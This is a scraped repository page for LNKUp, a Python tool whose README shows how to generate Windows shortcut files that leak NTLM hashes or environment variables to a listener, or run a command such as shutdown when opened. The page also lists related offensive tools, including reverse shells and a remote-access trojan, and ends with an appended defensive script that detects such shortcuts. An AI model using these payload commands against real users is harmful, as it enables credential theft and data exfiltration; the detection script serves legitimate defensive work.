Plazmaz / Lnkup
Generates malicious LNK file payloads for data exfiltration
Stars: ✭ 205
Programming Languages
python
Projects that are alternatives of or similar to Lnkup
Brutal
Payload for Teensy, like a Rubber Ducky but the syntax is different. This is a Human Interface Device (HID attacks). Penetration with Teensy. Brutal is a toolkit to quickly create various payloads, PowerShell attacks, virus attacks, and launch a listener for a Human Interface Device (Payload Teensy)
Stars: ✭ 678 (+230.73%)
Mutual labels: usb, penetration-testing, payload
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+1390.73%)
Mutual labels: pentesting, penetration-testing, payload
Oscp Pentest Methodologies
Assorted practical materials for OSCP exam preparation / practical penetration testing materials
Stars: ✭ 166 (-19.02%)
Mutual labels: pentesting, penetration-testing
Zap Cli
A simple tool for interacting with OWASP ZAP from the commandline.
Stars: ✭ 166 (-19.02%)
Mutual labels: pentesting, penetration-testing
Wstg
The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services.
Stars: ✭ 3,873 (+1789.27%)
Mutual labels: pentesting, penetration-testing
Silentbridge
Silentbridge is a toolkit for bypassing 802.1x-2010 and 802.1x-2004.
Stars: ✭ 136 (-33.66%)
Mutual labels: pentesting, penetration-testing
Quiver
Quiver is the tool to manage all of your tools for bug bounty hunting and penetration testing.
Stars: ✭ 140 (-31.71%)
Mutual labels: pentesting, penetration-testing
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (-16.1%)
Mutual labels: pentesting, penetration-testing
Jwtxploiter
A tool to test security of json web token
Stars: ✭ 130 (-36.59%)
Mutual labels: pentesting, penetration-testing
Awesome Shodan Queries
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻
Stars: ✭ 2,758 (+1245.37%)
Mutual labels: pentesting, penetration-testing
Crithit
Takes a single wordlist item and tests it one by one over a large collection of websites before moving onto the next. Create signatures to cross-check vulnerabilities over multiple hosts.
Stars: ✭ 182 (-11.22%)
Mutual labels: pentesting, penetration-testing
Knary
A simple HTTP(S) and DNS Canary bot with Slack/Discord/MS Teams & Pushover support
Stars: ✭ 187 (-8.78%)
Mutual labels: pentesting, penetration-testing
Xssmap
XSSMap is a tool developed in Python3 for detecting XSS vulnerabilities
Stars: ✭ 134 (-34.63%)
Mutual labels: pentesting, penetration-testing
Trigmap
A wrapper for Nmap to quickly run network scans
Stars: ✭ 132 (-35.61%)
Mutual labels: pentesting, penetration-testing
Fdsploit
File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
Stars: ✭ 199 (-2.93%)
Mutual labels: pentesting, penetration-testing
Learn Web Hacking
Study Notes For Web Hacking / Web security study notes
Stars: ✭ 2,326 (+1034.63%)
Mutual labels: pentesting, penetration-testing
Attiny85
RubberDucky like payloads for DigiSpark Attiny85
Stars: ✭ 169 (-17.56%)
Mutual labels: pentesting, payload
Hrshell
HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
Stars: ✭ 193 (-5.85%)
Mutual labels: pentesting, penetration-testing
Ratel
RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.
Stars: ✭ 121 (-40.98%)
Mutual labels: pentesting, payload
Pidrila
Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer
Stars: ✭ 125 (-39.02%)
Mutual labels: pentesting, penetration-testing
LNKUp
LNK Data exfiltration payload generator
This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.
Info
I am not responsible for any actions you take with this tool!
You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.
Known gotchas
- This tool will not work on OSX or Linux machines. It is specifically designed to target Windows.
- There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
- You will need to run a Responder or Metasploit module server to capture NTLM hashes.
- To capture environment variables, you'll need to run a web server like Apache, nginx, or even just this
Installation
Install requirements using
pip install -r requirements.txt
Usage
Payload types:
- NTLM
  - Steals the user's NTLM hash when rendered.
  - Needs a listener server such as this Metasploit module
  - More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/
  - Example usage:
    lnkup.py --host localhost --type ntlm --output out.lnk
- Environment
  - Steals the user's environment variables.
  - Examples: %PATH%, %USERNAME%, etc.
  - Requires variables to be set using --vars
  - Example usage:
    lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk
Extra:
- Use --execute to specify a command to run when the shortcut is double-clicked.
  - Example:
    lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"
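A defender-side triage check for the shortcuts described above, as an added example that is not part of LNKUp or its README: it flags .lnk files whose embedded strings reference a remote UNC host and lists any %VAR% tokens in that path. It assumes the shortcut carries its remote reference as a UNC path; `triage_lnk`, `build_sample`, the allow-list and the `.example` hosts are constructed for illustration.

```python
import re

# HeaderSize (0x4C) + LinkCLSID: the first 20 bytes of every Shell Link file.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
UNC = re.compile(r"\\\\([A-Za-z0-9._-]+)\\[^\"<>|]*")  # \\host\share\...
ENV = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)%")       # %USERNAME%, %PATH%, ...

def strings(blob):
    """Yield printable runs of 6+ characters stored as ASCII or UTF-16LE."""
    for m in re.finditer(rb"[\x20-\x7e]{6,}", blob):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){6,}", blob):
        yield m.group().decode("utf-16-le")

def triage_lnk(blob, allowed_hosts=()):
    """Heuristic string scan (not a full MS-SHLLINK parser): report UNC
    references to hosts outside allowed_hosts, plus %VAR% tokens in them."""
    if blob[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link (.lnk) file")
    allowed = {h.lower() for h in allowed_hosts}
    found = {}  # keyed by path so ASCII and Unicode copies are reported once
    for s in strings(blob):
        for m in UNC.finditer(s):
            host = m.group(1).lower()
            if host not in allowed:
                found[m.group(0)] = {
                    "host": host,
                    "path": m.group(0),
                    "env_vars": sorted(set(ENV.findall(m.group(0)))),
                }
    return list(found.values())

def build_sample(icon_path):
    """Constructed input, not a loadable shortcut: magic, zeroed header
    fields, then one counted UTF-16LE string standing in for an icon path."""
    return (LNK_MAGIC + bytes(56) + len(icon_path).to_bytes(2, "little")
            + icon_path.encode("utf-16-le"))

if __name__ == "__main__":
    sample = build_sample(r"\\listener.example\share\%USERNAME%_%PATH%.ico")
    for finding in triage_lnk(sample, allowed_hosts=["fileserver.corp.example"]):
        print(finding)
```

Run it over shortcuts arriving by mail, download or removable media; a hit on a host outside the allow-list is a reason to quarantine the file before Explorer renders it.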